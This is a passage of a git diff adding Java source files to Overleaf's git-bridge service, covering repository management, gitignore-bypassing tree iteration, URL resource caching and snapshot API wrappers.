java.nio.file.FileVisitResult; +import java.nio.file.FileVisitor; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.attribute.BasicFileAttributes; +import java.util.*; +import org.apache.commons.io.IOUtils; +import org.eclipse.jgit.api.Git; +import org.eclipse.jgit.api.ResetCommand; +import org.eclipse.jgit.api.errors.GitAPIException; +import org.eclipse.jgit.lib.PersonIdent; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.storage.file.FileRepositoryBuilder; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.util.RepositoryObjectTreeWalker; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Project; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Class representing a Git repository. + * + * It stores the projectName and repo separately because the hooks need to be + * able to construct one of these without knowing whether the repo exists yet. + * + * It can then be passed to the Bridge, which will either + * {@link #initRepo(RepoStore)} for a never-seen-before repo, or + * {@link #useExistingRepository(RepoStore)} for an existing repo. + * + * Make sure to acquire the project lock before calling methods here. + */ +public class GitProjectRepo implements ProjectRepo { + + private final String projectName; + private Optional<Repository> repository; + + public static GitProjectRepo fromJGitRepo(Repository repo) { + return new GitProjectRepo(repo.getWorkTree().getName(), Optional.of(repo)); + } + + public static GitProjectRepo fromName(String projectName) { + return new GitProjectRepo(projectName, Optional.empty()); + } + + GitProjectRepo(String projectName, Optional<Repository> repository) { + Preconditions.checkArgument(Project.isValidProjectName(projectName)); + this.projectName = projectName; + this.repository = repository; + } + + @Override + public String getProjectName() { + return projectName; + } + + @Override + public void initRepo(RepoStore repoStore) throws IOException { + initRepositoryField(repoStore); + Preconditions.checkState(repository.isPresent()); + Repository repo = this.repository.get(); + // TODO: assert that this is a fresh repo. At the moment, we can't be + // sure whether the repo to be init'd doesn't exist or is just fresh + // and we crashed / aborted while committing + if (repo.getObjectDatabase().exists()) return; + repo.create(); + } + + @Override + public void useExistingRepository(RepoStore repoStore) throws IOException { + initRepositoryField(repoStore); + Preconditions.checkState(repository.isPresent()); + Preconditions.checkState(repository.get().getObjectDatabase().exists()); + } + + @Override + public RawDirectory getDirectory() throws IOException, GitUserException { + Preconditions.checkState(repository.isPresent()); + return new RepositoryObjectTreeWalker(repository.get()).getDirectoryContents(Optional.empty()); + } + + @Override + public Collection<String> commitAndGetMissing(GitDirectoryContents contents) throws IOException { + try { + return doCommitAndGetMissing(contents); + } catch (GitAPIException e) { + throw new IOException(e); + } + } + + @Override + public void runGC() throws IOException { + Preconditions.checkState(repository.isPresent(), "Repo is not present"); + File dir = getProjectDir(); + Preconditions.checkState(dir.isDirectory()); + Log.debug("[{}] Running git gc", projectName); + Process proc = new ProcessBuilder("git", "gc").directory(dir).start(); + int exitCode; + try { + exitCode = proc.waitFor(); + Log.debug("Exit: {}", exitCode); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + if (exitCode != 0) { + Log.warn("[{}] Git gc failed", dir.getAbsolutePath()); + Log.warn(IOUtils.toString(proc.getInputStream(), StandardCharsets.UTF_8)); + Log.warn(IOUtils.toString(proc.getErrorStream(), StandardCharsets.UTF_8)); + throw new IOException("git gc error"); + } + Log.debug("[{}] git gc successful", projectName); + } + + @Override + public void deleteIncomingPacks() throws IOException { + Log.debug("[{}] Checking for garbage `incoming` files", projectName); + Files.walkFileTree( + getDotGitDir().toPath(), + new FileVisitor<Path>() { + @Override + public FileVisitResult preVisitDirectory(Path dir, BasicFileAttributes attrs) + throws IOException { + return FileVisitResult.CONTINUE; + } + + @Override + public FileVisitResult visitFile(Path file, BasicFileAttributes attrs) + throws IOException { + File file_ = file.toFile(); + String name = file_.getName(); + if (name.startsWith("incoming_") && name.endsWith(".pack")) { + Log.debug("Deleting garbage `incoming` file: {}", file_); + Preconditions.checkState(file_.delete()); + } + return FileVisitResult.CONTINUE; + } + + @Override + public FileVisitResult visitFileFailed(Path file, IOException exc) throws IOException { + Preconditions.checkNotNull(file); + Preconditions.checkNotNull(exc); + Log.warn("Failed to visit file: " + file, exc); + return FileVisitResult.TERMINATE; + } + + @Override + public FileVisitResult postVisitDirectory(Path dir, IOException exc) throws IOException { + Preconditions.checkNotNull(dir); + if (exc != null) { + return FileVisitResult.TERMINATE; + } + return FileVisitResult.CONTINUE; + } + }); + } + + @Override + public File getProjectDir() { + return getJGitRepository().getDirectory().getParentFile(); + } + + public void resetHard() throws IOException { + Git git = new Git(getJGitRepository()); + try { + git.reset().setMode(ResetCommand.ResetType.HARD).call(); + } catch (GitAPIException e) { + throw new IOException(e); + } + } + + @Override + public Repository getJGitRepository() { + return repository.get(); + } + + public File getDotGitDir() { + return getJGitRepository().getWorkTree(); + } + + private void initRepositoryField(RepoStore repoStore) throws IOException { + Preconditions.checkNotNull(repoStore); + Preconditions.checkArgument(Project.isValidProjectName(projectName)); + Preconditions.checkState(!repository.isPresent()); + repository = Optional.of(createJGitRepository(repoStore, projectName)); + } + + private Repository createJGitRepository(RepoStore repoStore, String projName) throws IOException { + File repoDir = new File(repoStore.getRootDirectory(), projName); + return new FileRepositoryBuilder().setWorkTree(repoDir).build(); + } + + private Collection<String> doCommitAndGetMissing(GitDirectoryContents contents) + throws IOException, GitAPIException { + Preconditions.checkState(repository.isPresent()); + Repository repo = getJGitRepository(); + resetHard(); + String name = getProjectName(); + Log.debug("[{}] Writing commit", name); + contents.write(); + Git git = new Git(getJGitRepository()); + Log.debug("[{}] Getting missing files", name); + Set<String> missingFiles = git.status().call().getMissing(); + for (String missing : missingFiles) { + Log.debug("[{}] Git rm {}", name, missing); + git.rm().setCached(true).addFilepattern(missing).call(); + } + Log.debug("[{}] Calling Git add", name); + git.add().setWorkingTreeIterator(new NoGitignoreIterator(repo)).addFilepattern(".").call(); + Log.debug("[{}] Calling Git commit", name); + git.commit() + .setAuthor( + new PersonIdent( + contents.getUserName(), + contents.getUserEmail(), + contents.getWhen(), + TimeZone.getDefault())) + .setMessage(contents.getCommitMessage()) + .call(); + Log.debug( + "[{}] Deleting files in directory: {}", name, contents.getDirectory().getAbsolutePath()); + Util.deleteInDirectoryApartFrom(contents.getDirectory(), ".git"); + return missingFiles; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/NoGitignoreIterator.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/NoGitignoreIterator.java new file mode 100644 index 0000000..437fdc1 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/NoGitignoreIterator.java @@ -0,0 +1,73 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.io.File; +import java.lang.reflect.Field; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.treewalk.AbstractTreeIterator; +import org.eclipse.jgit.treewalk.FileTreeIterator; +import org.eclipse.jgit.treewalk.WorkingTreeIterator; +import org.eclipse.jgit.treewalk.WorkingTreeOptions; +import org.eclipse.jgit.util.FS; + +/* + * Created by winston on 08/10/2016. + */ +public class NoGitignoreIterator extends FileTreeIterator { + + private static final Field ignoreNodeField; + + static { + try { + ignoreNodeField = WorkingTreeIterator.class.getDeclaredField("ignoreNode"); + } catch (NoSuchFieldException e) { + throw new RuntimeException(e); + } + ignoreNodeField.setAccessible(true); + } + + public NoGitignoreIterator(Repository repo) { + super(repo); + } + + public NoGitignoreIterator(Repository repo, FileModeStrategy fileModeStrategy) { + super(repo, fileModeStrategy); + } + + public NoGitignoreIterator(File root, FS fs, WorkingTreeOptions options) { + super(root, fs, options); + } + + public NoGitignoreIterator( + File root, FS fs, WorkingTreeOptions options, FileModeStrategy fileModeStrategy) { + super(root, fs, options, fileModeStrategy); + } + + protected NoGitignoreIterator(FileTreeIterator p, File root, FS fs) { + super(p, root, fs); + } + + protected NoGitignoreIterator( + WorkingTreeIterator p, File root, FS fs, FileModeStrategy fileModeStrategy) { + super(p, root, fs, fileModeStrategy); + } + + // Note: the `list` is a list of top-level entities in this directory, + // not a full list of files in the tree. + @Override + protected void init(Entry[] list) { + super.init(list); + try { + ignoreNodeField.set(this, null); + } catch (IllegalAccessException e) { + throw new RuntimeException(e); + } + } + + // When entering a sub-directory, create a new instance of this class, + // so we can also ignore gitignore specifications in sub-directories + @Override + protected AbstractTreeIterator enterSubtree() { + String fullPath = getDirectory().getAbsolutePath() + "/" + current().getName(); + return new NoGitignoreIterator(this, new File(fullPath), fs, fileModeStrategy); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/ProjectRepo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/ProjectRepo.java new file mode 100644 index 0000000..5d82e3d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/ProjectRepo.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.io.File; +import java.io.IOException; +import java.util.Collection; +import org.eclipse.jgit.lib.Repository; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; + +/* + * Created by winston on 20/08/2016. + */ +public interface ProjectRepo { + + String getProjectName(); + + void initRepo(RepoStore repoStore) throws IOException; + + void useExistingRepository(RepoStore repoStore) throws IOException; + + RawDirectory getDirectory() throws IOException, GitUserException; + + Collection<String> commitAndGetMissing(GitDirectoryContents gitDirectoryContents) + throws IOException, GitUserException; + + void runGC() throws IOException; + + void deleteIncomingPacks() throws IOException; + + File getProjectDir(); + + Repository getJGitRepository(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStore.java new file mode 100644 index 0000000..63ee3d1 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStore.java @@ -0,0 +1,82 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.io.File; +import java.io.IOException; +import java.io.InputStream; +import java.util.Collection; +import org.eclipse.jgit.lib.ObjectId; +import org.eclipse.jgit.lib.Repository; + +/* + * Created by winston on 20/08/2016. + */ +public interface RepoStore { + + /* Still need to get rid of these two methods. + Main dependency: GitRepoStore needs a Repository which needs a directory. + Instead, use a visitor or something. */ + String getRepoStorePath(); + + File getRootDirectory(); + + ProjectRepo initRepo(String project) throws IOException; + + ProjectRepo getExistingRepo(String project) throws IOException; + + ProjectRepo useJGitRepo(Repository repo, ObjectId commitId); + + void purgeNonexistentProjects(Collection<String> existingProjectNames); + + long totalSize(); + + /* + * Tars and bzip2s the .git directory of the given project. Throws an + * IOException if the project doesn't exist. The returned stream is a copy + * of the original .git directory, which must be deleted using remove(). + */ + InputStream bzip2Project(String projectName, long[] sizePtr) throws IOException; + + default InputStream bzip2Project(String projectName) throws IOException { + return bzip2Project(projectName, null); + } + + /* + * Tars and gzips the .git directory of the given project. Throws an + * IOException if the project doesn't exist. The returned stream is a copy + * of the original .git directory, which must be deleted using remove(). + */ + InputStream gzipProject(String projectName, long[] sizePtr) throws IOException; + + default InputStream gzipProject(String projectName) throws IOException { + return gzipProject(projectName, null); + } + + void gcProject(String projectName) throws IOException; + + /* + * Called after {@link #bzip2Project(String, long[])}'s has been safely + * uploaded to the swap store. Removes all traces of the project from disk, + * i.e. not just its .git, but the whole project's git directory. + * @param projectName + * @throws IOException + */ + void remove(String projectName) throws IOException; + + /* + * Unbzip2s the given data stream into a .git directory for projectName. + * Creates the project's git directory. + * If projectName already exists, throws an IOException. + * @param projectName the name of the project, e.g. abc123 + * @param dataStream the data stream containing the bzipped contents. + */ + void unbzip2Project(String projectName, InputStream dataStream) throws IOException; + + /* + * Ungzips the given data stream into a .git directory for projectName. + * Creates the project's git directory. + * If projectName already exists, throws an IOException. + * @param projectName the name of the project, e.g. abc123 + * @param dataStream the data stream containing the gzip contents. + */ + void ungzipProject(String projectName, InputStream dataStream) throws IOException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStoreConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStoreConfig.java new file mode 100644 index 0000000..feb01d3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/RepoStoreConfig.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.util.Optional; +import javax.annotation.Nullable; + +/* + * Created by winston on 02/07/2017. + */ +public class RepoStoreConfig { + + @Nullable private final Long maxFileSize; + + @Nullable private final Long maxFileNum; + + public RepoStoreConfig(Long maxFileSize, Long maxFileNum) { + this.maxFileSize = maxFileSize; + this.maxFileNum = maxFileNum; + } + + public Optional<Long> getMaxFileSize() { + return Optional.ofNullable(maxFileSize); + } + + public Optional<Long> getMaxFileNum() { + return Optional.ofNullable(maxFileNum); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/WalkOverrideGitRepo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/WalkOverrideGitRepo.java new file mode 100644 index 0000000..ded4269 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/repo/WalkOverrideGitRepo.java @@ -0,0 +1,89 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import java.io.File; +import java.io.IOException; +import java.util.Collection; +import java.util.Optional; +import org.eclipse.jgit.lib.ObjectId; +import org.eclipse.jgit.lib.Repository; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.util.RepositoryObjectTreeWalker; + +/* + * This class takes a GitProjectRepo and delegates all calls to it. + * + * The purpose is to insert a file size check in {@link #getDirectory()}. + * + * We delegate instead of subclass because we can't override the static + * constructors in {@link GitProjectRepo}. + */ +public class WalkOverrideGitRepo implements ProjectRepo { + + private final GitProjectRepo gitRepo; + + private final Optional<Long> maxFileSize; + + private final Optional<ObjectId> commitId; + + public WalkOverrideGitRepo( + GitProjectRepo gitRepo, Optional<Long> maxFileSize, Optional<ObjectId> commitId) { + this.gitRepo = gitRepo; + this.maxFileSize = maxFileSize; + this.commitId = commitId; + } + + @Override + public String getProjectName() { + return gitRepo.getProjectName(); + } + + @Override + public void initRepo(RepoStore repoStore) throws IOException { + gitRepo.initRepo(repoStore); + } + + @Override + public void useExistingRepository(RepoStore repoStore) throws IOException { + gitRepo.useExistingRepository(repoStore); + } + + @Override + public RawDirectory getDirectory() throws IOException, GitUserException { + Repository repo = gitRepo.getJGitRepository(); + RepositoryObjectTreeWalker walker; + if (commitId.isPresent()) { + walker = new RepositoryObjectTreeWalker(repo, commitId.get()); + } else { + walker = new RepositoryObjectTreeWalker(repo); + } + return walker.getDirectoryContents(maxFileSize); + } + + @Override + public Collection<String> commitAndGetMissing(GitDirectoryContents gitDirectoryContents) + throws GitUserException, IOException { + return gitRepo.commitAndGetMissing(gitDirectoryContents); + } + + @Override + public void runGC() throws IOException { + gitRepo.runGC(); + } + + @Override + public void deleteIncomingPacks() throws IOException { + gitRepo.deleteIncomingPacks(); + } + + @Override + public File getProjectDir() { + return gitRepo.getProjectDir(); + } + + @Override + public Repository getJGitRepository() { + return gitRepo.getJGitRepository(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/ResourceCache.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/ResourceCache.java new file mode 100644 index 0000000..3bf568f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/ResourceCache.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.bridge.resource; + +import java.io.IOException; +import java.util.Map; +import java.util.Optional; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; + +/* + * Created by winston on 20/08/2016. + */ +public interface ResourceCache { + + RawFile get( + String projectName, + String url, + String newPath, + Map<String, RawFile> fileTable, + Map<String, byte[]> fetchedUrls, + Optional<Long> maxFileSize) + throws IOException, SizeLimitExceededException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCache.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCache.java new file mode 100644 index 0000000..d01027d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCache.java @@ -0,0 +1,139 @@ +package uk.ac.ic.wlgitbridge.bridge.resource; + +import static org.asynchttpclient.Dsl.*; + +import java.io.IOException; +import java.util.List; +import java.util.Map; +import java.util.Optional; +import java.util.concurrent.ExecutionException; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.data.filestore.RepositoryFile; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; +import uk.ac.ic.wlgitbridge.io.http.ning.NingHttpClient; +import uk.ac.ic.wlgitbridge.io.http.ning.NingHttpClientFacade; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by winston on 20/08/2016. + */ +public class UrlResourceCache implements ResourceCache { + + private final DBStore dbStore; + + private final NingHttpClientFacade http; + + UrlResourceCache(DBStore dbStore, NingHttpClientFacade http) { + this.dbStore = dbStore; + this.http = http; + } + + public UrlResourceCache(DBStore dbStore) { + this(dbStore, new NingHttpClient(asyncHttpClient())); + } + + @Override + public RawFile get( + String projectName, + String url, + String newPath, + Map<String, RawFile> fileTable, + Map<String, byte[]> fetchedUrls, + Optional<Long> maxFileSize) + throws IOException, SizeLimitExceededException { + String path = dbStore.getPathForURLInProject(projectName, getCacheKeyFromUrl(url)); + byte[] contents; + if (path == null) { + path = newPath; + contents = fetch(projectName, url, path, maxFileSize); + fetchedUrls.put(url, contents); + } else { + Log.debug("Found (" + projectName + "): " + url); + Log.debug("At (" + projectName + "): " + path); + contents = fetchedUrls.get(url); + if (contents == null) { + RawFile rawFile = fileTable.get(path); + if (rawFile == null) { + Log.warn( + "File " + + path + + " was not in the current commit, " + + "or the git tree, yet path was not null. " + + "File url is: " + + url); + contents = fetch(projectName, url, path, maxFileSize); + } else { + contents = rawFile.getContents(); + } + } + } + return new RepositoryFile(newPath, contents); + } + + private byte[] fetch( + String projectName, final String url, String path, Optional<Long> maxFileSize) + throws FailedConnectionException, SizeLimitExceededException { + byte[] contents; + Log.debug("GET -> " + url); + try { + contents = + http.get( + url, + hs -> { + List<String> contentLengths = hs.getAll("Content-Length"); + if (!maxFileSize.isPresent()) { + return true; + } + if (contentLengths.isEmpty()) { + return true; + } + long contentLength = Long.parseLong(contentLengths.get(0)); + long maxFileSize_ = maxFileSize.get(); + if (contentLength <= maxFileSize_) { + return true; + } + throw new SizeLimitExceededException( + Optional.of(path), contentLength, maxFileSize_); + }); + } catch (ExecutionException e) { + Throwable cause = e.getCause(); + if (cause instanceof SizeLimitExceededException) { + throw (SizeLimitExceededException) cause; + } + Log.warn( + "ExecutionException when fetching project: " + + projectName + + ", url: " + + url + + ", path: " + + path, + e); + throw new FailedConnectionException(); + } + if (maxFileSize.isPresent() && contents.length > maxFileSize.get()) { + throw new SizeLimitExceededException(Optional.of(path), contents.length, maxFileSize.get()); + } + dbStore.addURLIndexForProject(projectName, getCacheKeyFromUrl(url), path); + return contents; + } + + /* + * Construct a suitable cache key from the given file URL. + * + * The file URL returned by the web service may contain a token parameter + * used for authentication. This token changes for every request, so we + * need to strip it from the query string before using the URL as a cache + * key. + */ + private String getCacheKeyFromUrl(String url) { + // We're not doing proper URL parsing here, but it should be enough to + // remove the token without touching the important parts of the URL. + // + // The URL looks like: + // + // https://history.overleaf.com/api/projects/:project_id/blobs/:hash?token=:token&_path=:path + return url.replaceAll("token=[^&]*", "token=REMOVED"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/NetSnapshotApi.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/NetSnapshotApi.java new file mode 100644 index 0000000..b8f2636 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/NetSnapshotApi.java @@ -0,0 +1,47 @@ +package uk.ac.ic.wlgitbridge.bridge.snapshot; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.Optional; +import java.util.concurrent.CompletableFuture; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocRequest; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionRequest; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersRequest; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.push.PushRequest; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; + +/* + * Created by winston on 20/08/2016. + */ +public class NetSnapshotApi implements SnapshotApi { + + @Override + public CompletableFuture<GetDocResult> getDoc(Optional<Credential> oauth2, String projectName) { + return new GetDocRequest(opt(oauth2), projectName).request(); + } + + @Override + public CompletableFuture<GetForVersionResult> getForVersion( + Optional<Credential> oauth2, String projectName, int versionId) { + return new GetForVersionRequest(opt(oauth2), projectName, versionId).request(); + } + + @Override + public CompletableFuture<GetSavedVersResult> getSavedVers( + Optional<Credential> oauth2, String projectName) { + return new GetSavedVersRequest(opt(oauth2), projectName).request(); + } + + @Override + public CompletableFuture<PushResult> push( + Optional<Credential> oauth2, CandidateSnapshot candidateSnapshot, String postbackKey) { + return new PushRequest(opt(oauth2), candidateSnapshot, postbackKey).request(); + } + + private static Credential opt(Optional<Credential> oauth2) { + return oauth2.orElse(null); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApi.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApi.java new file mode 100644 index 0000000..67fec43 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApi.java @@ -0,0 +1,49 @@ +package uk.ac.ic.wlgitbridge.bridge.snapshot; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.Optional; +import java.util.concurrent.CompletableFuture; +import java.util.concurrent.CompletionException; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.MissingRepositoryException; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; + +/* + * Created by winston on 20/08/2016. + */ +public interface SnapshotApi { + + CompletableFuture<GetDocResult> getDoc(Optional<Credential> oauth2, String projectName); + + CompletableFuture<GetForVersionResult> getForVersion( + Optional<Credential> oauth2, String projectName, int versionId); + + CompletableFuture<GetSavedVersResult> getSavedVers( + Optional<Credential> oauth2, String projectName); + + CompletableFuture<PushResult> push( + Optional<Credential> oauth2, CandidateSnapshot candidateSnapshot, String postbackKey); + + static <T> T getResult(CompletableFuture<T> result) + throws MissingRepositoryException, FailedConnectionException, ForbiddenException { + try { + return result.join(); + } catch (CompletionException e) { + try { + throw e.getCause(); + } catch (MissingRepositoryException + | FailedConnectionException + | ForbiddenException + | RuntimeException r) { + throw r; + } catch (Throwable __) { + throw e; + } + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApiFacade.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApiFacade.java new file mode 100644 index 0000000..07ac0a9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/snapshot/SnapshotApiFacade.java @@ -0,0 +1,121 @@ +package uk.ac.ic.wlgitbridge.bridge.snapshot; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.*; +import java.util.concurrent.CompletableFuture; +import java.util.stream.Collectors; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.data.model.Snapshot; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.MissingRepositoryException; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.GetSavedVersResult; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidProjectException; + +/* + * Created by winston on 02/07/2017. + */ +public class SnapshotApiFacade { + + private final SnapshotApi api; + + public SnapshotApiFacade(SnapshotApi api) { + this.api = api; + } + + public boolean projectExists(Optional<Credential> oauth2, String projectName) + throws FailedConnectionException, GitUserException { + try { + SnapshotApi.getResult(api.getDoc(oauth2, projectName)).getVersionID(); + return true; + } catch (InvalidProjectException e) { + return false; + } + } + + public Optional<GetDocResult> getDoc(Optional<Credential> oauth2, String projectName) + throws FailedConnectionException, GitUserException { + try { + GetDocResult doc = SnapshotApi.getResult(api.getDoc(oauth2, projectName)); + doc.getVersionID(); + return Optional.of(doc); + } catch (InvalidProjectException e) { + return Optional.empty(); + } + } + + public Deque<Snapshot> getSnapshots( + Optional<Credential> oauth2, String projectName, int afterVersionId) + throws GitUserException, FailedConnectionException { + List<SnapshotInfo> snapshotInfos = + getSnapshotInfosAfterVersion(oauth2, projectName, afterVersionId); + List<SnapshotData> snapshotDatas = getMatchingSnapshotData(oauth2, projectName, snapshotInfos); + return combine(snapshotInfos, snapshotDatas); + } + + public PushResult push( + Optional<Credential> oauth2, CandidateSnapshot candidateSnapshot, String postbackKey) + throws MissingRepositoryException, FailedConnectionException, ForbiddenException { + return SnapshotApi.getResult(api.push(oauth2, candidateSnapshot, postbackKey)); + } + + private List<SnapshotInfo> getSnapshotInfosAfterVersion( + Optional<Credential> oauth2, String projectName, int version) + throws FailedConnectionException, GitUserException { + SortedSet<SnapshotInfo> versions = new TreeSet<>(); + CompletableFuture<GetDocResult> getDoc = api.getDoc(oauth2, projectName); + CompletableFuture<GetSavedVersResult> savedVers = api.getSavedVers(oauth2, projectName); + GetDocResult latestDoc = SnapshotApi.getResult(getDoc); + int latest = latestDoc.getVersionID(); + // Handle edge-case for projects with no changes, that were imported + // to v2. In which case both `latest` and `version` will be zero. + // See: https://github.com/overleaf/writelatex-git-bridge/pull/50 + if (latest > version || (latest == 0 && version == 0)) { + for (SnapshotInfo snapshotInfo : SnapshotApi.getResult(savedVers).getSavedVers()) { + if (snapshotInfo.getVersionId() > version) { + versions.add(snapshotInfo); + } + } + versions.add( + new SnapshotInfo( + latest, latestDoc.getCreatedAt(), latestDoc.getName(), latestDoc.getEmail())); + } + return new ArrayList<>(versions); + } + + private List<SnapshotData> getMatchingSnapshotData( + Optional<Credential> oauth2, String projectName, List<SnapshotInfo> snapshotInfos) + throws FailedConnectionException, ForbiddenException { + List<CompletableFuture<GetForVersionResult>> firedRequests = + fireDataRequests(oauth2, projectName, snapshotInfos); + List<SnapshotData> snapshotDataList = new ArrayList<>(); + for (CompletableFuture<GetForVersionResult> fired : firedRequests) { + snapshotDataList.add(fired.join().getSnapshotData()); + } + return snapshotDataList; + } + + private List<CompletableFuture<GetForVersionResult>> fireDataRequests( + Optional<Credential> oauth2, String projectName, List<SnapshotInfo> snapshotInfos) { + return snapshotInfos.stream() + .map(snap -> api.getForVersion(oauth2, projectName, snap.getVersionId())) + .collect(Collectors.toList()); + } + + private static Deque<Snapshot> combine( + List<SnapshotInfo> snapshotInfos, List<SnapshotData> snapshotDatas) { + Deque<Snapshot> snapshots = new LinkedList<>(); + Iterator<SnapshotInfo> infos = snapshotInfos.iterator(); + Iterator<SnapshotData> datas = snapshotDatas.iterator(); + while (infos.hasNext()) { + snapshots.add(new Snapshot(infos.next(), datas.next())); + } + return snapshots; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/NoopSwapJob.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/NoopSwapJob.java new file mode 100644 index 0000000..977734a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/NoopSwapJob.java @@ -0,0 +1,19 @@ +package 